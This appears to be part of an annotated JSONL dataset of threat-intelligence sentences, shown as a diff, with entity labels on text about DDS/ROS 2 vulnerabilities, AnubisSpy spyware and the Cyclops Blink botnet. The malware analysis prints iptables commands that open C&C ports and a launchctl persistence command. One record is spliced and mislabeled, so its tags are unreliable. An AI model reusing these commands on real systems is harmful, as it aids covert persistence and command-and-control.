Discovery T0856: Spoof of Reporting Message","entities":[{"id":51234,"label":"attack-pattern","start_offset":138,"end_offset":164},{"id":15964,"label":"attack-pattern","start_offset":0,"end_offset":11},{"id":15966,"label":"attack-pattern","start_offset":79,"end_offset":99},{"id":15967,"label":"attack-pattern","start_offset":107,"end_offset":130}],"relations":[],"Comments":[]} -{"id":5191,"text":" Network RTPS discovery packet CVE-2021-38425 Fast-DDS, ROS 2 7.5 CWE-406: Network amplification CVE-2021-38429 OpenDDS, ROS 2 7.5 CVE-2021-38487 Connext DDS, ROS 2 7.5 CVE-2021-43547 CoreDX DDS, ROS 2 7.5 Malformed RTPS packet CVE-2021-38447 OpenDDS, ROS 2 8.6 CWE-405:","entities":[{"id":51235,"label":"vulnerability","start_offset":31,"end_offset":45},{"id":51237,"label":"vulnerability","start_offset":131,"end_offset":145},{"id":51238,"label":"vulnerability","start_offset":169,"end_offset":183},{"id":51239,"label":"vulnerability","start_offset":228,"end_offset":242},{"id":51236,"label":"vulnerability","start_offset":97,"end_offset":111}],"relations":[],"Comments":[]} -{"id":5192,"text":"Network amplification CVE-2021-38445 OpenDDS, ROS 2 7.0 CWE-130: Improper handling of length CVE-2021-38423 Gurum DDS, ROS 2 8.6 CWE-131: Incorrect calculation of buffer size CVE-2021-38435 Connext DDS, ROS 2 8.6 CVE-2021-38439 Gurum DDS, ROS 2 8.6 CWE-122:","entities":[{"id":51240,"label":"vulnerability","start_offset":22,"end_offset":36},{"id":51241,"label":"vulnerability","start_offset":93,"end_offset":107},{"id":51242,"label":"vulnerability","start_offset":175,"end_offset":189},{"id":51243,"label":"vulnerability","start_offset":213,"end_offset":227}],"relations":[],"Comments":[]} -{"id":5193,"text":"Heap-based buffer overflow T0862: Supply Chain Compromise T0839: Module Firmware T0873: Project File Infection","entities":[{"id":51244,"label":"attack-pattern","start_offset":88,"end_offset":110},{"id":15977,"label":"attack-pattern","start_offset":11,"end_offset":26},{"id":15978,"label":"attack-pattern","start_offset":34,"end_offset":57}],"relations":[],"Comments":[]} -{"id":5194,"text":" Configuration XML file CVE-2021-38427 Connext DDS, ROS 2 6.6 CWE-121: Stack-based buffer overflow CVE-2021-38433 Connext DDS, ROS 2 6.6 CVE-2021-38443 Cyclone DDS, ROS 2 6.6 CWE-228: Improper handling of syntactically invalid structure CVE-2021-38441 Cyclone DDS, ROS 2 6.6 CWE-123:","entities":[{"id":51247,"label":"vulnerability","start_offset":99,"end_offset":113},{"id":51248,"label":"vulnerability","start_offset":137,"end_offset":151},{"id":51245,"label":"attack-pattern","start_offset":71,"end_offset":98},{"id":51246,"label":"vulnerability","start_offset":24,"end_offset":38},{"id":51249,"label":"vulnerability","start_offset":237,"end_offset":251}],"relations":[],"Comments":[]} -{"id":5195,"text":"Write-what-where condition Table 2.","entities":[],"relations":[],"Comments":[]} -{"id":5196,"text":"A summary of our findings across the main DDS implementations and standard specification.","entities":[],"relations":[],"Comments":[]} -{"id":5197,"text":" When the security gaps on the network attack surface are exploited, it allows an attacker to perform spoofing, reconnaissance, automated data collection, and denial of service (DoS), affecting the control of an exposed system.","entities":[],"relations":[],"Comments":[]} -{"id":5198,"text":"Meanwhile, the vulnerabilities we found on the configuration attack surface can be abused to affect the DDS developer or system integrator, potentially compromising the integrity of the software supply chain.","entities":[],"relations":[],"Comments":[]} -{"id":5199,"text":"Vulnerabilities in the standard specification","entities":[],"relations":[],"Comments":[]} -{"id":5200,"text":"The built-in RTPS discovery protocol is used in peer-to-peer networks to discover the locator of each participant (such as IP address and UDP\/TCP port or offset in shared memory).","entities":[],"relations":[],"Comments":[]} -{"id":5201,"text":"The “chatty” nature of this discovery protocol and the fact that it expects a reply from each contacted participant, paired with easy-to-spoof transport protocols such as the User Datagram Protocol (UDP), make RTPS vulnerable to network reflection and amplification.","entities":[{"id":51250,"label":"attack-pattern","start_offset":229,"end_offset":265}],"relations":[],"Comments":[]} -{"id":5202,"text":"Confidentiality and authenticity for this data is not protected even with DDS Security, making it possible for an attacker to spoof the information. CVE ID","entities":[],"relations":[],"Comments":[]} -{"id":5203,"text":"Scope","entities":[],"relations":[],"Comments":[]} -{"id":5204,"text":"Partially Mitigated*","entities":[],"relations":[],"Comments":[]} -{"id":5205,"text":"BAF Percentage of Attack Duration (Total experiment duration = 139s) CVE-2021-38425 Fast-DDS, ROS 2 master branch 9.875 100.0 CVE-2021-38429 OpenDDS, ROS 2 >= 3.18.1 18.68 24.17 CVE-2021-38487","entities":[{"id":51251,"label":"vulnerability","start_offset":70,"end_offset":84},{"id":51252,"label":"vulnerability","start_offset":127,"end_offset":141},{"id":51253,"label":"vulnerability","start_offset":179,"end_offset":193}],"relations":[],"Comments":[]} -{"id":5206,"text":"Connext DDS, ROS 2 >= 6.1.0 2.011 84.17 CVE-2021-43547 CoreDX DDS, ROS 2 > 5.9.1 32.82 18.14 Table 3.","entities":[{"id":51254,"label":"vulnerability","start_offset":40,"end_offset":54}],"relations":[],"Comments":[]} -{"id":5207,"text":"The network reflection and amplification vulnerability with bandwidth amplification factor (BAF) is calculated as the ratio between outbound and reflected traffic.","entities":[{"id":51256,"label":"vulnerability","start_offset":4,"end_offset":96}],"relations":[],"Comments":[]} -{"id":5208,"text":"Note: Implementations with less than 100% attack duration likely have a timeout mechanism.","entities":[],"relations":[],"Comments":[]} -{"id":5209,"text":"(*) A full mitigation will require relevant changes in the RTPS specification.","entities":[],"relations":[],"Comments":[]} -{"id":5210,"text":" The longest running node was based on Connext DDS (at 139 seconds), which we kept as a reference.","entities":[],"relations":[],"Comments":[]} -{"id":5211,"text":"Table 3 shows that the BAF is greater than one, implying there are asymmetric network flows although the values are at the order of magnitude lower than modern amplification attacks (note that Memcached can reach 10,000 to 51,000 BAF).","entities":[],"relations":[],"Comments":[]} -{"id":5212,"text":"However, the network bandwidth in embedded systems is also lower than, for example, what internet nodes can provide.","entities":[],"relations":[],"Comments":[]} -{"id":5213,"text":"An attacker can abuse this built-in discovery feature for remote discovery and fingerprinting.","entities":[],"relations":[],"Comments":[]} -{"id":5214,"text":"We sent RPTS discovery probes to the entire IPv4 space (except for the no-scan subnets) and received answers from 643 hosts (excluding obvious honeypots).","entities":[],"relations":[],"Comments":[]} -{"id":5215,"text":"Notably, hosts never stopped sending traffic to us, even if we only sent them a single 288-byte packet.","entities":[],"relations":[],"Comments":[]} -{"id":5216,"text":"This new network-reflection vulnerability that we found is not the only instance of a specification-level vulnerability.","entities":[],"relations":[],"Comments":[]} -{"id":5217,"text":"Security researchers from different organizations have been documenting and creating attack scenarios abusing these vulnerabilities as early as 2015.","entities":[{"id":51257,"label":"TIME","start_offset":144,"end_offset":148}],"relations":[],"Comments":[]} -{"id":5218,"text":"Conclusion","entities":[],"relations":[],"Comments":[]} -{"id":5219,"text":"Proper supply chain management processes allow contextualization, tracking, and monitoring of new vulnerabilities within different downstream software using a specific library such as DDS.","entities":[],"relations":[],"Comments":[]} -{"id":5220,"text":"In the case of this middleware technology, DDS is just one of the many critical libraries used in embedded applications that’s easy to lose track of.","entities":[],"relations":[],"Comments":[]} -{"id":5221,"text":"Our paper, “A Security Analysis of the Data Distribution Service (DDS) Protocol,” includes short- and long-term mitigation best practices and recommendations, as well as a consideration for adopting a shift-left approach.","entities":[],"relations":[],"Comments":[]} -{"id":5222,"text":"We also acknowledge the cooperation and engaging response that some vendors like ADLINK have adopted when we approached them with our findings.","entities":[{"id":51258,"label":"identity","start_offset":81,"end_offset":87}],"relations":[],"Comments":[]} -{"id":5223,"text":"As we encourage more DDS researchers, users, and implementors to keep on studying and promoting security awareness for the DDS ecosystem, we hope the level of engagement we received can serve as a model for the software industry.","entities":[],"relations":[],"Comments":[]} -{"id":5224,"text":"Download our full paper here.","entities":[],"relations":[],"Comments":[]} -{"id":5225,"text":" Tags Exploits & Vulnerabilities | Research | Cyber Threats | ICS OT | APT & Targeted Attacks | Compliance & Risks | IoT | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":5226,"text":"Android malware like ransomware exemplify how the platform can be lucrative for cybercriminals.","entities":[{"id":51259,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":5227,"text":"But there are also other threats stirring up as of late: attacks that spy on and steal data from specific targets, crossing over between desktops and mobile devices.","entities":[],"relations":[],"Comments":[]} -{"id":5229,"text":"These were published on Google Play — but have since been taken down — and third-party app marketplaces.","entities":[{"id":51261,"label":"SOFTWARE","start_offset":24,"end_offset":35}],"relations":[],"Comments":[]} -{"id":5230,"text":"We named these malicious apps AnubisSpy (ANDROIDOS_ANUBISSPY) as all the malware’s payload is a package called watchdog.","entities":[{"id":51263,"label":"malware","start_offset":111,"end_offset":119},{"id":51262,"label":"malware","start_offset":41,"end_offset":60},{"id":16073,"label":"malware","start_offset":30,"end_offset":39}],"relations":[{"id":1072,"from_id":51262,"to_id":16073,"type":"duplicate-of"}],"Comments":[]} -{"id":5231,"text":"We construe AnubisSpy to be linked to the cyberespionage campaign Sphinx (APT-C-15) based on shared file structures and command-and-control (C&C) server as well as targets.","entities":[{"id":51265,"label":"campaign","start_offset":65,"end_offset":83},{"id":51264,"label":"malware","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} -{"id":5232,"text":"It’s also possible that while AnubisSpy’s operators may also be Sphinx’s, they could be running separate but similar campaigns.","entities":[{"id":51266,"label":"campaign","start_offset":64,"end_offset":70},{"id":16081,"label":"malware","start_offset":30,"end_offset":39}],"relations":[],"Comments":[]} -{"id":5233,"text":" What can AnubisSpy do?","entities":[{"id":16085,"label":"malware","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} -{"id":5234,"text":" AnubisSpy can steal messages (SMS), photos, videos, contacts, email accounts, calendar events, and browser histories (i.e., Chrome and Samsung Internet Browser).","entities":[{"id":51267,"label":"malware","start_offset":1,"end_offset":10},{"id":51268,"label":"attack-pattern","start_offset":15,"end_offset":35},{"id":51269,"label":"SOFTWARE","start_offset":125,"end_offset":131},{"id":51270,"label":"SOFTWARE","start_offset":136,"end_offset":160}],"relations":[],"Comments":[]} -{"id":5235,"text":"It can also take screenshots and record audio, including calls.","entities":[],"relations":[],"Comments":[]} -{"id":5236,"text":"It can spy on the victim through apps installed on the device, a list of which is in its configuration file that can be updated.","entities":[],"relations":[],"Comments":[]} -{"id":5237,"text":"This includes Skype, WhatsApp, Facebook, and Twitter, among others.","entities":[{"id":51273,"label":"SOFTWARE","start_offset":31,"end_offset":39},{"id":51271,"label":"SOFTWARE","start_offset":14,"end_offset":19},{"id":51272,"label":"SOFTWARE","start_offset":21,"end_offset":29},{"id":51274,"label":"SOFTWARE","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} -{"id":5238,"text":"After the data are collected, they are encrypted and sent to the (C&C) server.","entities":[],"relations":[],"Comments":[]} -{"id":5239,"text":"AnubisSpy can also self-destruct to cover its tracks.","entities":[{"id":16104,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":5240,"text":"It can run commands and delete files on the device, as well as install and uninstall Android Application Packages (APKs).","entities":[],"relations":[],"Comments":[]} -{"id":5241,"text":"AnubisSpy has several modules, each of which has a separate role.","entities":[{"id":51275,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":5242,"text":"AnubisSpy’s code is well constructed, indicating the developer\/s’ know-how.","entities":[{"id":51276,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":5243,"text":"Below is a visualization of the modules: Figure 1: Structure of AnubisSpy’s modules","entities":[{"id":51277,"label":"malware","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} -{"id":5244,"text":"How is AnubisSpy related to Sphinx?","entities":[{"id":51278,"label":"campaign","start_offset":28,"end_offset":34},{"id":16114,"label":"malware","start_offset":7,"end_offset":16}],"relations":[],"Comments":[]} -{"id":5245,"text":" Sphinx reportedly uses the watering hole technique via social media sites to deliver its payloads — mainly a customized version of njRAT.","entities":[{"id":51279,"label":"campaign","start_offset":1,"end_offset":7},{"id":51280,"label":"malware","start_offset":132,"end_offset":137}],"relations":[{"id":1073,"from_id":51279,"to_id":51280,"type":"uses"}],"Comments":[]} -{"id":5246,"text":"The Sphinx campaign operators cloaked the malware with icons of legitimate applications to dupe recipients into clicking them.","entities":[{"id":51281,"label":"campaign","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} -{"id":5247,"text":"Sphinx was active between June 2014 and November 2015, but timestamps of the malware indicate the attacks started as early as 2011.","entities":[{"id":51283,"label":"TIME","start_offset":26,"end_offset":35},{"id":51285,"label":"TIME","start_offset":126,"end_offset":130},{"id":51282,"label":"campaign","start_offset":0,"end_offset":6},{"id":51284,"label":"TIME","start_offset":40,"end_offset":53}],"relations":[],"Comments":[]} -{"id":5248,"text":"A simple WHOIS query of AnubisSpy’s C&C server showed it abused a legitimate managed hosting service provider in Belize.","entities":[{"id":51286,"label":"location","start_offset":113,"end_offset":119},{"id":16127,"label":"malware","start_offset":24,"end_offset":33}],"relations":[],"Comments":[]} -{"id":5249,"text":"We correlated the AnubisSpy variants to Sphinx’s desktop\/PC-targeting malware through the following: Shared C&C server, 86[.]105[.]18[.]107 Shared technique of decrypting JSON files, and similarity between the file structures of AnubisSpy and Sphinx’s malware Similar targets (highly concentrated in Middle Eastern countries) Figure 2: Comparison of file structure in Sphinx’s desktop\/PC-targeting malware (left) and AnubisSpy (right)","entities":[{"id":51288,"label":"malware","start_offset":18,"end_offset":27},{"id":51287,"label":"location","start_offset":301,"end_offset":315},{"id":16131,"label":"IPV4","start_offset":121,"end_offset":140},{"id":16134,"label":"malware","start_offset":230,"end_offset":239},{"id":16130,"label":"campaign","start_offset":40,"end_offset":46},{"id":16142,"label":"malware","start_offset":422,"end_offset":431},{"id":16140,"label":"campaign","start_offset":373,"end_offset":379},{"id":16136,"label":"campaign","start_offset":244,"end_offset":250}],"relations":[{"id":1074,"from_id":16130,"to_id":51288,"type":"uses"},{"id":1075,"from_id":16131,"to_id":16130,"type":"indicates"},{"id":1076,"from_id":16136,"to_id":51287,"type":"targets"},{"id":1077,"from_id":16134,"to_id":51287,"type":"targets"}],"Comments":[]} -{"id":5251,"text":"Our coordination with Google also revealed that these apps were installed across a handful of countries in the Middle East.","entities":[{"id":51291,"label":"identity","start_offset":22,"end_offset":28},{"id":51292,"label":"location","start_offset":111,"end_offset":122}],"relations":[],"Comments":[]} -{"id":5252,"text":" Was AnubisSpy actively distributed?","entities":[{"id":51293,"label":"malware","start_offset":5,"end_offset":14}],"relations":[],"Comments":[]} -{"id":5253,"text":"We analyzed seven apps that were actually AnubisSpy.","entities":[{"id":51294,"label":"malware","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} -{"id":5254,"text":"These were signed with the same fake Google certificates.","entities":[],"relations":[],"Comments":[]} -{"id":5255,"text":"We found two more apps created by the same developer, but they had no espionage-related codes; we think they were made as experimental projects.","entities":[],"relations":[],"Comments":[]} -{"id":5256,"text":"Based on hardcoded strings in the Agent Version, the malicious apps were developed as early as April 2015.","entities":[{"id":51295,"label":"TIME","start_offset":95,"end_offset":105}],"relations":[],"Comments":[]} -{"id":5257,"text":"Timestamps indicate that the earliest sample was signed on June 2015; the latest variant was signed on May 2017.","entities":[{"id":51296,"label":"TIME","start_offset":59,"end_offset":68},{"id":51297,"label":"TIME","start_offset":103,"end_offset":111}],"relations":[],"Comments":[]} -{"id":5258,"text":"AnubisSpy wasn’t only published on Google Play.","entities":[{"id":51299,"label":"SOFTWARE","start_offset":35,"end_offset":46},{"id":51298,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":5259,"text":"We also found versions of it in third-party app marketplaces, most likely as a way to expand the malware’s reach.","entities":[],"relations":[],"Comments":[]} -{"id":5260,"text":"The apps mainly used Middle East-based news and sociopolitical themes as social engineering hooks and abused social media to further proliferate.","entities":[{"id":51300,"label":"attack-pattern","start_offset":73,"end_offset":91},{"id":51301,"label":"attack-pattern","start_offset":102,"end_offset":121}],"relations":[],"Comments":[]} -{"id":5261,"text":"Versions of AnubisSpy posed as social news, promotional, healthcare, and entertainment apps.","entities":[{"id":51302,"label":"malware","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} -{"id":5262,"text":"What does AnubisSpy mean to the mobile landscape?","entities":[{"id":16180,"label":"malware","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} -{"id":5263,"text":"Persistent and furtive spyware is an underrated problem for the mobile platform.","entities":[],"relations":[],"Comments":[]} -{"id":5264,"text":"While cyberespionage campaigns on mobile devices may be few and far between compared to ones for desktops or PCs, AnubisSpy proves that they do indeed occur, and may have been more active than initially thought.","entities":[{"id":51303,"label":"malware","start_offset":114,"end_offset":123}],"relations":[],"Comments":[]} -{"id":5265,"text":"Will mobile become cyberespionage’s main frontier?","entities":[],"relations":[],"Comments":[]} -{"id":5266,"text":"It won’t be a surprise given mobile platform’s increasing ubiquity, especially in workplaces.","entities":[],"relations":[],"Comments":[]} -{"id":5267,"text":"Beyond its effects, AnubisSpy also highlights the significance of proactively securing mobile devices, particularly if they’re on BYOD programs and used to access sensitive data.","entities":[{"id":51304,"label":"malware","start_offset":20,"end_offset":29}],"relations":[],"Comments":[]} -{"id":5268,"text":"Enforcing the principle of least privilege and implementing an app reputation system are just some of the best practices that can help mitigate threats.","entities":[],"relations":[],"Comments":[]} -{"id":5269,"text":"We disclosed our findings to Google on October 12 and worked with Google on further analyzing the AnubisSpy-related apps.","entities":[{"id":51306,"label":"TIME","start_offset":39,"end_offset":49},{"id":51308,"label":"malware","start_offset":98,"end_offset":107},{"id":51305,"label":"identity","start_offset":29,"end_offset":35},{"id":51307,"label":"identity","start_offset":66,"end_offset":72}],"relations":[],"Comments":[]} -{"id":5270,"text":"Updates were also made to Google Play Protect to take appropriate action against those apps that have been verified as in violation of Google Play policy.","entities":[{"id":51309,"label":"SOFTWARE","start_offset":26,"end_offset":45},{"id":51310,"label":"SOFTWARE","start_offset":135,"end_offset":146}],"relations":[],"Comments":[]} -{"id":5271,"text":"An in-depth technical analysis of AnubisSpy, along with indicators of compromise, is in this technical brief.","entities":[{"id":51311,"label":"malware","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} -{"id":5272,"text":" Trend Micro Solutions End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro™ Mobile Security which is also available on Google Play.","entities":[{"id":51313,"label":"SOFTWARE","start_offset":118,"end_offset":146},{"id":51312,"label":"SOFTWARE","start_offset":1,"end_offset":22},{"id":51314,"label":"SOFTWARE","start_offset":174,"end_offset":185}],"relations":[],"Comments":[]} -{"id":5273,"text":"For organizations, Trend Micro™ Mobile Security for Enterprise provides device, compliance and application management, data protection, and configuration provisioning, as well as protects devices from attacks that leverage vulnerabilities, preventing unauthorized access to apps, as well as detecting and blocking malware and fraudulent websites.","entities":[{"id":51315,"label":"SOFTWARE","start_offset":19,"end_offset":62}],"relations":[],"Comments":[]} -{"id":5274,"text":"Trend Micro’s Mobile App Reputation Service (MARS) covers Android and iOS threats using leading sandbox and machine learning technologies.","entities":[{"id":51317,"label":"SOFTWARE","start_offset":58,"end_offset":65},{"id":51318,"label":"SOFTWARE","start_offset":70,"end_offset":73},{"id":51316,"label":"SOFTWARE","start_offset":0,"end_offset":50}],"relations":[],"Comments":[]} -{"id":5275,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[],"relations":[],"Comments":[]} -{"id":5276,"text":" Tags Malware | APT & Targeted Attacks | Endpoints | Research |","entities":[],"relations":[],"Comments":[]} -{"id":5277,"text":"Mobile","entities":[],"relations":[],"Comments":[]} -{"id":5278,"text":"With additional insights from Philippe Z Lin Note: This article has been updated on March 17, 2022, 2:00 a.m. ET to include Asus’ security bulletin.","entities":[{"id":51321,"label":"identity","start_offset":124,"end_offset":128},{"id":51320,"label":"TIME","start_offset":84,"end_offset":112},{"id":51319,"label":"identity","start_offset":30,"end_offset":44}],"relations":[],"Comments":[]} -{"id":5279,"text":"Cyclops Blink, an advanced modular botnet that is reportedly linked to the Sandworm or Voodoo Bear advanced persistent threat (APT) group, has recently been used to target WatchGuard Firebox devices according to an analysis performed by the UK’s National Cyber Security Centre (NCSC).","entities":[{"id":51322,"label":"malware","start_offset":0,"end_offset":13},{"id":51324,"label":"threat-actor","start_offset":87,"end_offset":98},{"id":51323,"label":"threat-actor","start_offset":75,"end_offset":83},{"id":51325,"label":"identity","start_offset":241,"end_offset":283}],"relations":[{"id":1078,"from_id":51324,"to_id":51323,"type":"duplicate-of"},{"id":1079,"from_id":51322,"to_id":51323,"type":"related-to"}],"Comments":[]} -{"id":5280,"text":"We acquired a variant of the Cyclops Blink malware family that targets Asus routers.","entities":[{"id":51326,"label":"malware","start_offset":29,"end_offset":42},{"id":51327,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} -{"id":5281,"text":"This report discusses the technical capabilities of this Cyclops Blink malware variant and includes a list of more than 150 current and historical command-and-control (C&C) servers of the Cyclops Blink botnet.","entities":[{"id":51328,"label":"malware","start_offset":57,"end_offset":70},{"id":51329,"label":"malware","start_offset":188,"end_offset":201}],"relations":[],"Comments":[]} -{"id":5282,"text":"This list aims to aid cybersecurity defenders in searching for affected devices in their networks and starting the remediation process.","entities":[],"relations":[],"Comments":[]} -{"id":5283,"text":" We have reached out to Asus regarding our investigation, and they have created a security bulletin that includes a security checklist to help prevent Cyclops Blink attacks, as well as a list of affected Asus products.","entities":[{"id":51330,"label":"malware","start_offset":151,"end_offset":164},{"id":51331,"label":"identity","start_offset":204,"end_offset":208}],"relations":[],"Comments":[]} -{"id":5284,"text":"Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage.","entities":[{"id":51332,"label":"malware","start_offset":34,"end_offset":47},{"id":51334,"label":"SOFTWARE","start_offset":109,"end_offset":127},{"id":51335,"label":"SOFTWARE","start_offset":132,"end_offset":144}],"relations":[{"id":1080,"from_id":51332,"to_id":51334,"type":"targets"},{"id":1081,"from_id":51332,"to_id":51335,"type":"targets"}],"Comments":[]} -{"id":5285,"text":"Hence, we believe that it is possible that the Cyclops Blink botnet’s main purpose is to build an infrastructure for further attacks on high-value targets.","entities":[{"id":51333,"label":"malware","start_offset":47,"end_offset":60}],"relations":[],"Comments":[]} -{"id":5286,"text":"Cyclops Blink has been around since at least June 2019, and a considerable number of its C&C servers and bots are active for up to about three years.","entities":[{"id":51336,"label":"malware","start_offset":0,"end_offset":13},{"id":51337,"label":"TIME","start_offset":45,"end_offset":54}],"relations":[],"Comments":[]} -{"id":5287,"text":" The Sandworm APT group has been attributed as creating both Cyclops Blink and the VPNFilter internet of things (IoT) botnet.","entities":[{"id":51338,"label":"threat-actor","start_offset":6,"end_offset":14},{"id":51339,"label":"malware","start_offset":62,"end_offset":75},{"id":51340,"label":"malware","start_offset":84,"end_offset":93}],"relations":[{"id":1083,"from_id":51340,"to_id":51338,"type":"attributed-to"},{"id":1082,"from_id":51339,"to_id":51338,"type":"attributed-to"}],"Comments":[]} -{"id":5288,"text":"VPNFilter, first discovered in 2018, targeted router and storage devices.","entities":[{"id":51341,"label":"TIME","start_offset":31,"end_offset":35},{"id":16290,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":5289,"text":"It was also reported to have infected hundreds of thousands of devices.","entities":[],"relations":[],"Comments":[]} -{"id":5290,"text":"In 2021, Trend Micro published a technical analysis of VPNFilter, which includes a discussion of how the botnet continues to affect infected systems two years after its discovery.","entities":[{"id":51344,"label":"malware","start_offset":55,"end_offset":64},{"id":51342,"label":"TIME","start_offset":3,"end_offset":7},{"id":51343,"label":"identity","start_offset":9,"end_offset":20}],"relations":[],"Comments":[]} -{"id":5291,"text":"Sandworm was also responsible for many high-profile attacks, including the 2015 and 2016 attacks on the Ukrainian electrical grid, the 2017 NotPetya attack, the 2017 French presidential campaign, the 2018 Olympic Destroyer attack on the Winter Olympic Games, and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW). Cyclops Blink malware analysis Cyclops Blink is a modular malware written in the C language.","entities":[{"id":51352,"label":"TIME","start_offset":265,"end_offset":269},{"id":51345,"label":"threat-actor","start_offset":0,"end_offset":8},{"id":51350,"label":"TIME","start_offset":161,"end_offset":165},{"id":51354,"label":"malware","start_offset":354,"end_offset":367},{"id":51355,"label":"malware","start_offset":386,"end_offset":399},{"id":51346,"label":"TIME","start_offset":75,"end_offset":79},{"id":51347,"label":"TIME","start_offset":84,"end_offset":88},{"id":51349,"label":"campaign","start_offset":140,"end_offset":155},{"id":51351,"label":"TIME","start_offset":200,"end_offset":204},{"id":51348,"label":"TIME","start_offset":135,"end_offset":139}],"relations":[],"Comments":[]} -{"id":5292,"text":"In its core component, the first thing that the malware does is to check if its executable file name starts with \"[k\".","entities":[],"relations":[],"Comments":[]} -{"id":5293,"text":"If it does not, it performs the following routine: It redirects both stdout and stderr file descriptors to \/dev\/null.","entities":[{"id":51356,"label":"FILEPATH","start_offset":109,"end_offset":118}],"relations":[],"Comments":[]} -{"id":5294,"text":" It sets the default handlers for SIGTERM, SIGINT, SIGBUS, SIGPIPE, and SIGIO signals.","entities":[],"relations":[],"Comments":[]} -{"id":5295,"text":" It reloads itself with a new \"[ktest]\" process name.","entities":[],"relations":[],"Comments":[]} -{"id":5296,"text":" It then waits for 37 seconds before it sets up its hard-coded parameters.","entities":[],"relations":[],"Comments":[]} -{"id":5297,"text":"These include the hard-coded C&C servers and the interval that should be used to communicate with the C&C servers.","entities":[],"relations":[],"Comments":[]} -{"id":5298,"text":" It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data.","entities":[],"relations":[],"Comments":[]} -{"id":5299,"text":"It also enables non-blocking I\/O for the writing file descriptor by using ioctl().","entities":[],"relations":[],"Comments":[]} -{"id":5300,"text":" After this, a new data packet will be created in memory, which will then be sent to a C&C server.","entities":[],"relations":[],"Comments":[]} -{"id":5301,"text":"The details of this communication are covered later in this analysis.","entities":[],"relations":[],"Comments":[]} -{"id":5302,"text":"For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter — the Linux kernel firewall — using the iptc_insert_entry() function from libiptc1 to allow output communication to it.","entities":[{"id":51359,"label":"SOFTWARE","start_offset":118,"end_offset":139},{"id":51357,"label":"tools","start_offset":102,"end_offset":111}],"relations":[],"Comments":[]} -{"id":5303,"text":"The rules have the following parameters: Protocol: TCP Chain: filter Table: OUTPUT Action: ACCEPT","entities":[],"relations":[],"Comments":[]} -{"id":5304,"text":"Destination ports: 636, 994, and 995","entities":[],"relations":[],"Comments":[]} -{"id":5305,"text":"For an unknown reason, the malware deletes the aforementioned rules and creates them again, this time using the iptables command via the system() function.","entities":[],"relations":[],"Comments":[]} -{"id":5306,"text":"The commands are as follows: iptables -D OUTPUT -p tcp --dport %d -j ACCEPT iptables -I OUTPUT -p tcp --dport %d -j ACCEPT ","entities":[],"relations":[],"Comments":[]} -{"id":5307,"text":"The OpenSSL library is then initialized, and the core component proceeds to initialize the hard-coded modules.","entities":[{"id":51360,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} -{"id":5308,"text":" Modules initialization ","entities":[],"relations":[],"Comments":[]} -{"id":5309,"text":"During this part, the core component initializes the modules.","entities":[],"relations":[],"Comments":[]} -{"id":5310,"text":"Communication with the modules is performed via pipes.","entities":[],"relations":[],"Comments":[]} -{"id":5311,"text":"For each hard-coded module, the malware creates two pipes before executing them in their own child processes.","entities":[],"relations":[],"Comments":[]} -{"id":5312,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":5313,"text":"The function that initializes the modules In Figure 1, we inferred the following mod_t structure: Figure 2.","entities":[],"relations":[],"Comments":[]} -{"id":5314,"text":"Inferred mod_t structure; the last member is unknown.","entities":[],"relations":[],"Comments":[]} -{"id":5315,"text":" Parameters","entities":[],"relations":[],"Comments":[]} -{"id":5316,"text":"The parameters are then initialized.","entities":[],"relations":[],"Comments":[]} -{"id":5317,"text":"They consist of a 592-byte structure containing essential information sent to the modules via pipes.","entities":[],"relations":[],"Comments":[]} -{"id":5318,"text":"This information includes: A “ \/dev\/nul or launchctl load ~\/Library\/LaunchAgents\/ filename.plist > \/dev\/nul will then command the operating system to start the dropped backdoor file at login.","entities":[{"id":29553,"label":"location","start_offset":9,"end_offset":13},{"id":29554,"label":"attack-pattern","start_offset":40,"end_offset":49},{"id":29555,"label":"location","start_offset":50,"end_offset":54},{"id":29556,"label":"attack-pattern","start_offset":107,"end_offset":116},{"id":29557,"label":"location","start_offset":117,"end_offset":121},{"id":29558,"label":"location","start_offset":172,"end_offset":176},{"id":29559,"label":"location","start_offset":214,"end_offset":219}],"relations":[],"Comments":[]} +{"id":12605,"text":"Arrival Vector","entities":[{"id":39188,"label":"tools","start_offset":8,"end_offset":14}],"relations":[],"Comments":[]} +{"id":1187,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":7309,"text":"TCP stream excerpt of the malware receiving commands from C&C server","entities":[],"relations":[],"Comments":[]} +{"id":7690,"text":".LNK shortcut in .ISO file","entities":[],"relations":[],"Comments":[]} +{"id":8026,"text":"In this blog, we explore some of the most notable campaigns we\u2019ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":24889,"label":"location","start_offset":37,"end_offset":41},{"id":24893,"label":"attack-pattern","start_offset":181,"end_offset":189}],"relations":[],"Comments":[]} +{"id":6898,"text":"Upon reviewing phishing attempts since the beginning of this year, we\u2019ve seen a rising number of 